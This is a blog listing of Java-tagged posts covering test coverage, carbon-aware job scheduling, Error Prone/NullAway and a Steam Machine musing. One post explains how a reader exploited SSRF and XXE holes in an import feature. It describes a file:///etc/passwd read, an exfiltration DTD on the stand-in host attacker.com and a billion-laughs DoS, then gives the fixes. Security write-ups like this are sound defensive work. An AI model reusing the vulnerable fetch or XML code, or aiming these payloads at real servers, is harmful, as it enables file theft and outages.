Posts in Java (20 found)

Coverage

Sometimes, the question arises: which tests trigger this code here? Maybe I've found a block of code that doesn't look like it can't be hit, but it's hard to prove. Or I want to answer the age-old question of which subset of quick tests might be useful to run if the full test suite is kinda slow. So, run each test with coverage by itself. Then, instead of merging all the coverage data, find which tests cover the line in question. Oddly enough, though some of the Java tools (e.g., Clover) support per-test coverage, the tools here in general are somewhat lacking. , part of the suite, supports a ("test name") marker, but only displays the per test data on a per-file level: This is the kind of thing where in 2025, you can ask a coding agent to vibe-code or vibe-modify a generator, and it'll work fine. I have not found the equivalent of Profilerpedia for coverage file formats, but the lowest common denominator seems to be . The file format is described at geninfo(1) . Most language ecosystems can either produce LCOV output directly or have pre-existing conversion tools.

0 views
Brain Baking 2 days ago

Using Energy Prediction To Better Plan Cron Jobs

Since the Belgian government mandated the use of digitized smart energy meters we’ve been more carefully monitoring our daily energy demand. Before, we’d simply chuck all the dishes in the machine and program it to run at night: no more noise when we’re around. But now, consuming energy at night is costing us much more. The trick is to take as little as possible from the grid, but also put as little as possible back. In short, consume (or store) energy when our solar panels produce it. That dishwasher will have to run at noon instead. The same principle applies to running demanding software: CPU or GPU-intensive tasks consume an awful amount of energy, so why run them when there’s less energy available locally, thus paying more? Traditionally, these kinds of background jobs are always scheduled at night using a simple cron expression like that says “At 03:00 AM, kick things in gear”. But we can do better. At 03:00 AM, our solar panels are asleep too. Why not run the job when the sun is shining? Probably because you don’t want to interfere with the heavy load of your software system during the day thanks to your end users. It’s usually not a good idea to start generating PDF files en masse , clogging up all available threads, severely slowing down the handling of incoming HTTP requests. But there’s still a big margin to improve the planning of the job: instead of saying “At 03:00 AM exactly ”, why can’t we say “Between 01:00 AM and 07:00 AM”? That’s still before the big HTTP rush, and in the early morning, chances are there’s more cheap energy available to you. Cooking up a simple version of this for home use is easy with the help of Home Assistant. The following historical graph shows our typical energy demand during the last week (dreadful Belgian weather included): Home Assistant history of P1 Energy Meter Demand from 24 Nov to 28 Nov. Care to guess what these spikes represent? Evenings. Turning on the stove, the oven, the lights, the TV obviously creates a big spike in energy consumption, and at the same time, the moon replacing the sun results in us taking instead of giving from the energy grid. This is the reason the government charges more then: if everybody creates spikes at the same time, there’s much more pressure on the general grid. But I can’t bake my fries at noon when I’m work and we aren’t supposed to watch TV when we’re working from home… That data is available through the Home Assistant API: . Use an authorization header with a Bearer token created in your Home Assistant profile. If you collect this for a few weeks and average the results you can make an estimated guess when demand will be going up or down. If you want things to get a bit more fancy, you can use the EMHASS Home Assistant plug-in that includes a power production forecast module. This thing uses machine learning and other APIs such as https://solcast.com/ that predicts solar power—or weather in general: the better the weather, the more power available to burn through (given you’ve got solar panels installed). EMHASS also internalizes your power consumption habits. Combined, its prediction model can help to better plan your jobs when energy demand is low and availability is high. You don’t need Home Assistant to do this, but the software does help smooth things over with centralized access to data using a streamlined API. Our energy consumption and generation is measured using HomeWizard’s P1 Meter that plugs into our provider’s digital meter and sends the data over to Home Assistant. That’s cool if you are running software in your own basement, but will hardly do on a bigger scale. Instead of monitoring your own energy usage, you can rely on grid data from the providers. In Europe, the European Network of Transmission System Operators for Electricity (ENTSO-E) provides APIs to access power statistics based on your region—including a day-ahead forecast! In USA, there’s the U.S. Energy Information Administration (EIA) providing the equivalent, also including a forecast, depending on the state. ENTSO-E returns a day-ahead pricing model while EIA returns consumption in megawatthours, but both statistics can be used for the same thing: to better plan that cron job. And that’s exactly what we at JobRunr managed to do. JobRunr is an open-source Java library for easy asynchronous background job scheduling that I’ve had the pleasure to work on the last year. Using JobRunr, planning a job with a cron expression is trivial: But we don’t want that thing to trigger at 3 AM, remember? Instead, we want it to trigger between an interval, when the energy prices are at their lowest, meaning when the CPU-intensive job will produce the least amount of CO2 . In JobRunr v8, we introduced the concept of Carbon Aware Job Processing that uses energy prediction of the aforementioned APIs to better plan your cron jobs. The configuration for this is ridiculously easy: (1) tell JobRunr which region you’re in, (2) adjust that cron. Done. Instead of , use : this means “plan at somewhere between an hour before 3 AM to four hours later than 3 AM, when the lowest amount of CO2 will be generated”. That string is not a valid cron expression but a custom extension on it we invented to minimize configuration. Behind the scene, JobRunr will look up the energy forecasts for your region and plan the job according to your specified time range. There are other ways to plan jobs (e.g. fire-and-forget, providing s instaed of a cron, …), but you get the gist. JobRunr’s dashboard can be consulted to inspect when the job is due for processing. Since the scheduled picks can sometimes be confusing—why did it plan this at 6 AM and not at 7?—the dashboard also visualizes the predictions. In the following screenshot, you can see being planned at 15:00 PM, with an initial interval between 09:39 and 17:39 (GMT+2): The JobRunr dashboard: a pending job, to be processed on Mon Jul 07 2025 at 15:00 PM. There’s also a practical guide that helps you get started if you’re interested in fooling around with the system. The idea here is simple: postpone firing up that CPU to the moments with more sunshine, when energy is more readily available, and when less CO2 will be generated 1 . If you’re living in Europe/Belgium, you’re probably already trying to optimize the energy consumption in your household the exact same way because of the digital meters. Why not applying this principle on a grander scale? Amazon offers EC2 Spot Instances to “optimize compute usage” which is also marketed as more sustainable, but this is not the same thing. Shifting your cloud workout to a Spot Instance will use “spare energy” that was already being generated. JobRunr, and hopefully soon other software that optimized jobs based on energy availability, plans using marginal changes. In theory, the decision can determine the fuel resource as high spikes force high-emission plants to burn more fuel. In always-on infrastructure, spare compute capacity is sold as the Spot product—there’s no marginal change. The environmental impact of planning your job to align with low grid carbon intensity is much higher—in a good way—compared to shifting cloud instance types from on-demand/reserved to Spot. Still, it’s better than nothing, I guess. If the recent outages of these big cloud providers have taught us anything, it’s that on-premise self-hosting is not dead yet. If you happen to be rocking Java, give JobRunr a try. And if you’re not, we challenge you to implement something similar and make the world a better place! You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability. It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎ Related topics: / java / By Wouter Groeneveld on 28 November 2025.  Reply via email . You probably already noticed that in this article I’ve interchanged carbon intensity with energy availability. It’s a lot more complicated than that, but for the purpose of Carbon Aware Job Processing, we assume a strong relationship between the electricity price and CO2 emissions.  ↩︎

0 views
Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Brain Baking 4 days ago

Rendering Your Java Code Less Error Prone

Error Prone is Yet Another Programming Cog invented by Google to improve their Java build system. I’ve used the multi-language PMD static code analyser before (don’t shoot the messenger!), but Error Prone takes it a step further: it hooks itself into your build system, converting programming errors as compile-time errors. Great, right, detecting errors earlier, without having to kick an external process like PMD into gear? Until you’re forced to deal with hundreds of errors after enabling it: sure. Expect a world of hurt when your intention is to switch to Error Prone just to improve code linting, especially for big existing code bases. Luckily, there’s a way to gradually tighten the screw: first let it generate a bunch of warnings and only when you’ve tackled most of them, turn on Error! Halt! mode. When using Gradle with multiple subprojects, things get a bit more convoluted. This mainly serves as a recollection of things that finally worked—feeling of relief included. The root file: The first time you enable it, you’ll notice a lot of nonsensical errors popping up: that’s what that is for. We currently have the following errors disabled: Error Prone’s powerful extendability resulted in Uber picking up where Google left off by releasing NullAway , a plug-in that does annotation-based null checking fully supporting the JSpecify standard . That is, it checks for stupid stuff like: JSpecify is a good attempt at unifying these annotations—last time I checked, IntelliJ suggested auto-importing them from five different packages—but the biggest problem is that you’ll have to dutifully annotate where needed yourself. There are OpenRewrite JSpecify recipes available to automatically add them but that won’t even cover 20% of the cases, as when it comes to manual if null checks and the use of , NullAway is just too stupid to understand what your intentions are. NullAway assumes non-null by default. This is important, because in Java object terminology, everything is nullable by default. You won’t need to add a lot of annotations, but adding has a significant ripple effect: if that’s nullable, then the object calling this object might also be, which means I should add this annotation here and here and here and here and here and… Uh oh. After 100 compile errors, Gradle gives up. I fixed 100 errors, recompiled, and 100 more appeared. This fun exercise lasted almost an entire day until I was the one giving up. The potential commit touched hundreds of files and added more bloat to an already bloated (it’s Java, remember) code base I’ve ever seen. Needless to say, we’re currently evaluating our options here. I’ve also had quite a bit of trouble picking the right combination of plug-ins for Gradle to get this thing working. In case you’d like to give it a go, extend the above configuration with: You have to point NullAway to the base package path ( ) otherwise it can’t do its thing. Note the configuration: we had a lot of POJOs with private constructors that set fields to while they actually cannot be null because of serialisation frameworks like Jackson/Gson. Annotate these with and NullAway will ignore them. If you thought fixing all Error Prone errors was painful, wait until you enable NullAway. Every single statement needs its annotation. OpenRewrite can help, but up to a point, as for more complicated assignments you’ll need to decide for yourself what to do. Not that the exercise didn’t bear any fruit. I’ve spotted more than a few potential mistakes we made in our code base this way, and it’s fun to try and minimize nullability. The best option of course is to rewrite the whole thing in Kotlin and forget about the suffix. All puns aside, I can see how Error Prone and its plug-ins can help catch bugs earlier, but it’s going to come at a cost: that of added annotation bloat. You probably don’t want to globally disable too many errors so is also going to pop up much more often. A difficult team decision to make indeed. Related topics: / java / By Wouter Groeneveld on 25 November 2025.  Reply via email . —that’s a Google-specific one? I don’t even agree with this thing being here… —we’d rather have on every line next to each other —we can’t update to JDK9 just yet —we’re never going to run into this issue —good luck with fixing that if you heavily rely on reflection

0 views
Dan Moore! 1 weeks ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in–web application development. I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021 ). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it. But my real software education came in the WCTS ; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good. I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines. My first job out of school was slinging perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team. One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages. Which are, as Joel Spolsky wrote , similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software using a language that requires memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free. I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

0 views
A Room of My Own 1 weeks ago

My One-Board Trello Task Management System

So I just came out of a project management webinar — and they shared this really simple task-management method. And I realized that I’ve basically been doing this all along. It’s about moving away from constantly trying to prioritise everything to simply postponing things in a deliberate, thought-out way. And it felt nice to see that this thing I pieced together is,  a “real” method. After years of trying to figure out how to manage all my different tasks, I came up with a system a few years ago that has just worked. I haven’t had to change it in ages. I’ve tried different apps, different methods, different everything — but this setup (which I run in Trello, though you could do it anywhere that has Kanban boards) has stuck. Why Trello? Mostly because it’s free, simple, and the phone app works. It sends reminders to my email (which I’ll see because I keep inbox zero) and as phone pop-ups. The email part is key for me — if it hits my inbox, it won’t get lost. Over time this system grew with me, but this is where I’ve landed: one single board . Just one. Below is the breakdown of my lists on this one board (though I do add more when I need to — if I have extra tasks or a project, like planning a trip, spring cleaning, I’ll add a temporary list for it). When a task or a list is done, I delete it. I don’t archive it, I don’t capture it anywhere else. Done and gone. You can email directly into Trello — I rarely do, but I like knowing I could. This list is where I stick generic things: kids’ school holidays, public and work statutory holidays, my goals for the year, and my very loose 5-year “plan” (which is more vibes than plan, honestly). Because I like the Eisenhower Matrix method (I wrote about it here) , I have a few lists that follow that idea: Urgent + important. - Things that actually need to happen pretty soon or right away. That elusive middle ground where all the good long-term things live. I’m honestly terrible at this list lately because work has been so full-on — which is also why my personal projects, like blogging, have been basically nonexistent. But this is where those long-term goals go: things like education, personal skill development, improving health and wellness — all the stuff that matters but always falls behind the “do immediately” tasks, and therefore need to be scheduled. Anything already booked, or anything that repeats: insurance payments, car registration, health appointments, whatever. I put a date on it, set a reminder, and forget about it until it surfaces again. I do this for the whole family. Why not just put it all in my shared (with my husband and son) Google Calendar? Because some things don’t need to be done on the day they pop up. For example: car registration. I set a reminder a month before it’s due. I won’t do it that exact day, but it will pop up, I’ll drag it to “Do Immediately,” and then it gets done. If something goes in Google Calendar, it’s because it happens at an actual fixed time — dinner with a friend, a scheduled doctor’s appointment, whatever. Those don’t go in Trello. This took me a long time to figure out. These are things that don’t need to be done, nothing is riding on them, but they matter (and maybe they shouldn’t) to me. I wrote about some of it here: The Art of Organizing (Things That Don’t Need to Be Organized) The Journal Project I Can’t Quit The Cost of Organizing Ideas – But I Keep Doing It Anyway An example is my digital photo books. I use Mixbook or Shutterfly services, and the kids love having the physical copy of a digital photobooks to leaf through. And so do I. I make ones for big trips too. But then I realised: if those companies disappear, all my digital books vanish. You can’t download them as PDFs or export them in any meaningful way (apart from having the printed copies — but what if my house burns down, or I want another copy?). After researching and asking around, the only real solution seems to be opening them full screen, taking screenshots, and saving them in Day One (link to one of my posts about it). It’s a huge project (well, potentially, once I start working on something and break it down into smaller tasks - it gets done). But I’m not touching it right now. However, having it on the list gets it out of my head. The other lists I have on my board are: I like knowing how much I spend and when things renew. I regularly cancel things. For example, Kindle Unlimited: I sign up when there’s a deal or when I need it, then cancel again. Same with Apple TV — if there’s a show I want, I get it for a month, then drop it. I hate having too many subscriptions that sit there unused. I didn’t put these in recurring tasks because some documents are valid for years or even decades. So I just keep a list. Sometimes I attach the files, but I don’t fully trust Trello with sensitive things, so the actual scanned documents live in my Dropbox. Renovations, things I want to study, photo books I still want to make. These live even further out than the “may or may not do” list. Not urgent, not actionable, probably not happening soon — but I don’t want to forget about them either. And most importantly, I don’t want to think about them. When I do a review, I’ll see them, remember them, and that’s enough. It’s simple. It’s not over-engineered. It’s not automated to death. It’s easy to maintain. And most importantly: things actually get done. My lists used to be huge and chaotic. This isn’t. NOTE: For work tasks I use Microsoft To Do, since it plugs straight into the rest of the Microsoft ecosystem we use.

3 views

Tai Chi: A General High-Efficiency Scheduling Framework for SmartNICs in Hyperscale Clouds

Tai Chi: A General High-Efficiency Scheduling Framework for SmartNICs in Hyperscale Clouds Bang Di, Yun Xu, Kaijie Guo, Yibin Shen, Yu Li, Sanchuan Cheng, Hao Zheng, Fudong Qiu, Xiaokang Hu, Naixuan Guan, Dongdong Huang, Jinhu Li, Yi Wang, Yifang Yang, Jintao Li, Hang Yang, Chen Liang, Yilong Lv, Zikang Chen, Zhenwei Lu, Xiaohan Ma, and Jiesheng Wu SOSP'25 Here is a contrarian view: the existence of hypervisors means that operating systems have fundamentally failed in some way. I remember thinking this a long time ago, and it still nags me from time to time. What does a hypervisor do? It virtualizes hardware so that it can be safely and fairly shared. But isn’t that what an OS is for? My conclusion is that this is a pragmatic engineering decision. It would simply be too much work to try to harden a large OS such that a cloud service provider would be comfortable allowing two competitors to share one server. It is a much safer bet to leave the legacy OS alone and instead introduce the hypervisor. This kind of decision comes up in other circumstances too. There are often two ways to go about implementing something. The first way involves widespread changes to legacy code, and the other way involves a low-level Jiu-Jitsu move which achieves the desired goal while leaving the legacy code untouched. Good managers have a reliable intuition about these decisions. The context here is a cloud service provider which virtualizes the network with a SmartNIC. The SmartNIC (e.g., NVIDIA BlueField-3 ) comprises ARM cores and programmable hardware accelerators. On many systems, the ARM cores are part of the data-plane (software running on an ARM core is invoked for each packet). These cores are also used as part of the control-plane (e.g., programming a hardware accelerator when a new VM is created). The ARM cores on the SmartNIC run an OS (e.g., Linux), which is separate from the host OS. The paper says that the traditional way to schedule work on SmartNIC cores is static scheduling. Some cores are reserved for data-plane tasks, while other cores are reserved for control-plane tasks. The trouble is, the number of VMs assigned to each server (and the size of each VM) changes dynamically. Fig. 2 illustrates a problem that arises from static scheduling: control-plane tasks take more time to execute on servers that host many small VMs. Source: https://dl.acm.org/doi/10.1145/3731569.3764851 Dynamic Scheduling Headaches Dynamic scheduling seems to be a natural solution to this problem. The OS running on the SmartNIC could schedule a set of data-plane and control-plane threads. Data-plane threads would have higher priority, but control-plane threads could be scheduled onto all ARM cores when there aren’t many packets flowing. Section 3.2 says this is a no-go. It would be great if there was more detail here. The fundamental problem is that control-plane software on the SmartNIC calls kernel functions which hold spinlocks (which disable preemption) for relatively long periods of time. For example, during VM creation, a programmable hardware accelerator needs to be configured such that it will route packets related to that VM appropriately. Control-plane software running on an ARM core achieves this by calling kernel routines which acquire a spinlock, and then synchronously communicate with the accelerator. The authors take this design as immutable. It seems plausible that the communication with the accelerator could be done in an asynchronous manner, but that would likely have ramifications to the entire control-plane software stack. This quote is telling: Furthermore, the CP ecosystem comprises 300–500 heterogeneous tasks spanning C, Python, Java, Bash, and Rust, demanding non-intrusive deployment strategies to accommodate multi-language implementations without code modification. Here is the Jiu-Jitsu move: lie to the SmartNIC OS about how many ARM cores the SmartNIC has. Fig. 7(a) shows a simple example. The underlying hardware has 2 cores, but Linux thinks there are 3. One of the cores that the Linux scheduler sees is actually a virtual CPU (vCPU), the other two are physical CPUs (pCPU). Control-plane tasks run on vCPUs, while data-plane tasks run on pCPUs. From the point of view of Linux, all three CPUs may be running simultaneously, but in reality, a Linux kernel module (5,800 lines of code) is allowing the vCPU to run at times of low data-plane activity. Source: https://dl.acm.org/doi/10.1145/3731569.3764851 One neat trick the paper describes is the hardware workload probe . This takes advantage of the fact that packets are first processed by a hardware accelerator (which can do things like parsing of packet headers) before they are processed by an ARM core. Fig. 10 shows that the hardware accelerator sees a packet at least 3 microseconds before an ARM core does. This enables this system to hide the latency of the context switch from vCPU to pCPU. Think of it like a group of students in a classroom without any teachers (e.g., network packets). The kids nominate one student to be on the lookout for an approaching adult. When the coast is clear, the students misbehave (i.e., execute control-plane tasks). When the lookout sees the teacher (a network packet) returning, they shout “act responsible”, and everyone returns to their schoolwork (running data-plane code). Source: https://dl.acm.org/doi/10.1145/3731569.3764851 Results Section 6 of the paper has lots of data showing that throughput (data-plane) performance is not impacted by this technique. Fig. 17 shows the desired improvement for control-plane tasks: VM startup time is roughly constant no matter how many VMs are packed onto one server. Source: https://dl.acm.org/doi/10.1145/3731569.3764851 Dangling Pointers To jump on the AI bandwagon, I wonder if LLMs will eventually change the engineering equation. Maybe LLMs will get to the point where widespread changes across a legacy codebase will be tractable. If that happens, then Jiu-Jitsu moves like this one will be less important. Thanks for reading Dangling Pointers! Subscribe for free to receive new posts and support my work.

0 views
A Room of My Own 1 weeks ago

Letting Go of My Library

I recently read a few very interesting articles about personal libraries . Here is one that haunts me about Cormac McCarthy’s huge personal library and his vast, chaotic collection of “stuff”. For as long as I can remember, I’ve loved the idea of having a library of my own. But as I get older, something about it has started to feel unsettling. The thought of being surrounded by piles of things—books, objects, layers of accumulated life—now makes me uneasy. I crave order, clean spaces, and easy living unburdened by stuff. Large empty spaces and shelves call to me. I started collecting books when I was a student. They moved with me between different flats, and at one point I had over a thousand titles. I cherish them all, even the ones I haven’t read, because I agree with whoever said that reading and collecting books are two different hobbies. But as the saying goes, we spend the second half of our lives getting rid of the things we so fervently collected in the first half. I’ve been in that situation for several years now. I moved countries with a large container of stuff, only to realize I could probably have left 90% of it behind and never missed it. In fact, it took me years to slowly get rid of it. I wrote once about decluttering my clothes the Marie Kondo way. I’ve done the same with my house—again and again—until I got to a minimalist look and feel that I was happy with. For the past two years I’ve been in a very high-stress role at work, and sometimes taking care of my house, when everything else feels out of control, is the one thing I can do. I’m well aware of it, but it still leaves me with a nice, clean, minimal home. I live with a non-minimalist husband who, thankfully, gets on board every now and then. If it weren’t for him, it would be even more minimalist. Recently, after another round of spring cleaning, I finally got to my library. I’ve decluttered it many times since moving to New Zealand, but books are easy to come by here. There are lots of secondhand shops in town, and every February/March there’s a beautiful book fair where you can stock up for winter. It’s also easy to donate books, and I’ve been doing that. Still, I had too many. Reading those articles, and realizing I now read most of my books on Kindle, I felt the urge to minimize my library again. My criteria were simple: Get rid of books I’ve read and know I’ll never read again. Get rid of books I haven’t read but know I’ll probably never read. Get rid of books on subjects I’m no longer interested in, or that I could easily borrow from the library or download if I change my mind later. Get rid of novels I’ve saved for years, waiting to read, but never did. Having shelves so full was also stopping me from borrowing (but not buying) new books, because I felt weighed down by all the unread ones sitting at home. So I took all the books down. I got my husband to go through his too. Surprisingly, he got rid of quite a few. It was easier than I expected to minimize my library to the point where it now looks almost empty. People commented that it looks too empty. But I’m not worried. I feel like I can finally breathe. The books were gone in a day—donated, given to friends, or put on the book exchange shelves at work. What’s left are my true favorites, the ones I’ll reread. My husband’s books are breathing now too—he loves Bob Woodward and all kinds of political and spy thrillers, and he actually rereads them, so those stay. The goal isn’t to have no books at all, but to keep only the ones that genuinely matter, and to leave room for new interests when they arrive. So while I still appreciate big libraries—and if this were the 90s or early 2000s, when we didn’t have Kindles and books were harder or more expensive to get, I might still keep one—right now, a lighter library just feels better. There are still a few hundred books on my shelves (and I’ll admit to owning a set of about 50 nearly-new hardcover classics I picked up at an auction for $15. They’re currently sitting in the attic, waiting for some imaginary future where we have space to display them purely for decoration, because I doubt I’ll read them again). But my shelves can finally breathe, and so can I. I can happily pick up a book, flip through it, enjoy the moment, and put it back down—without feeling weighed down by the sheer volume of “stuff.” Here is the before, during and after of my library. Arguably, the before is more aesthetically pleasing, but the after makes me feel so much lighter, full of possibility. At this point in my life, I think I’d be completely fine not having any shelves or books at all. But even my kids, who don’t particularly enjoy reading (at least not the way I did when I was younger), were upset when I got rid of so many books—they say they like the feeling of them, the atmosphere they create. I agree. I love looking at other people’s libraries and I always will. Get rid of books I’ve read and know I’ll never read again. Get rid of books I haven’t read but know I’ll probably never read. Get rid of books on subjects I’m no longer interested in, or that I could easily borrow from the library or download if I change my mind later. Get rid of novels I’ve saved for years, waiting to read, but never did.

0 views
Brain Baking 2 weeks ago

Why I Don't Need a Steam Machine

For those of you who are living under a rock, Valve announced three new hardware devices joining their Steam Deck line-up: a new controller, a VR headset, and the GameCube—no wait, GabeCube—no wait, Steam Machine. The shiny little cube is undoubtedly Valve’s (second) attempt to break into the console market. This time, it might just work. The hardware is ready to arrive in at your living room spring next year. The biggest question is: will it arrive at our living room? Reading all the hype has certainly enthused me (e.g. Brendon’s The Steam Machine is the Future , PC Gamer’s Valve is all over ARM , Eurogamer’s Steam Machine preview , ResetEra’s Steam Hardware thread ); especially the part where the Machine is just a PC that happens to be tailored towards console gaming. According to Valve, you can install anything you want on it—it’s just SteamOS just like your trusty Deck, meaning you can boot into KDE and totally do your thing. Except that this shiny little cube is six times as powerful. I’m sure Digital Foundry will validate that next year. Valve's newly announced Steam Machine: a mysterious looking sleek black box. However, this post isn’t about specs, expectations, or dreams: it’s about tempering my own enthusiasm. I’d like to tell myself why I don’t really need a Steam Machine. The following list will hopefully make it easier to say no when the buy buttons become available. So you see, I don’t really need a Steam Machine… Fuck it, I’m getting one. Related topics: / steam / games / By Wouter Groeneveld on 16 November 2025.  Reply via email . You’re a retro gamer. You don’t need the power of six Steam Decks. To do what, run DOSBox? Your TV doesn’t support 4K . Again, no need for those 4K 60 FPS. You generally dislike AAA games. With The Steam Machine, you might be able to finally properly run DOOM Eternal and all of the Assassin’s Creed games. That you don’t like playing. You don’t have time to play games anyway. Ouch, that hurts but it’s not untrue. The TV will be occupied anyway. The Steam Machine is not a Switch: you can’t switch to handheld mode. When are you going to play on the Machine if the TV is being used to watch your wife’s favourite shows? You already have too many gaming related hardware pieces. That’ll mean you’ll have to divide your time by an even bigger number to devote an equal amount to playing them. There’s no room for yet another nondescript box under the TV. See above: why don’t you first try to do something with that SNES Mini and PlayStation Mini besides letting it collect dust? You’re a physical gamer. This is Steam. There will be no insertion of cartridges, no blowing of carts, and no staring at game collections on a shelf. It’s Steam, not Good Old Games. Sure it can run GOG games but the Machine is primarily designed to run Steam. You avoid purchasing from Steam like the plague, yet you’re willing to buy a Machine dedicated to it? Are you crazy? The last time you booted Steam was over a year ago. Don’t tell me you’re suddenly interested in running the platform on a dedicated machine. You don’t have time to fiddle with configuration. Button and trackpad mappings to get the controls just right enough to play strategy games designed to be played with keyboard and mouse will only leave you frustrated. Your MacBook can emulate Windows games just fine. You recently bought CrossOver and played Wizordum and older Windows 98/XP stuff on it. It even runs Against The Storm flawlessly. No need for Proton or whatever. In two years, you’ll upgrade your M1 to an M4+: there’s the power upgrade. If CrossOver is struggling to run that particular game you so badly want to play, it’ll be buttery smooth in a few years. You’re going to do the laptop upgrade anyway regardless of the Steam Machine. You already have a huge gaming backlog. Thanks to your buddy Joel you bought too many physical Switch games that are still waiting to be touched. Are you really ready to open up another can of worms? You dislike a digital backlog. It’s easy to have hundreds of games on there: see your GOG purchases. Why don’t you try to count the ones that you actually played, let alone finished. You’re not going to use the Machine to run office software. Your laptop and other retro machines are good enough at handling that task. What are you really going to do with this cube besides gaming? Those cool looking indie games will be released for Switch in due 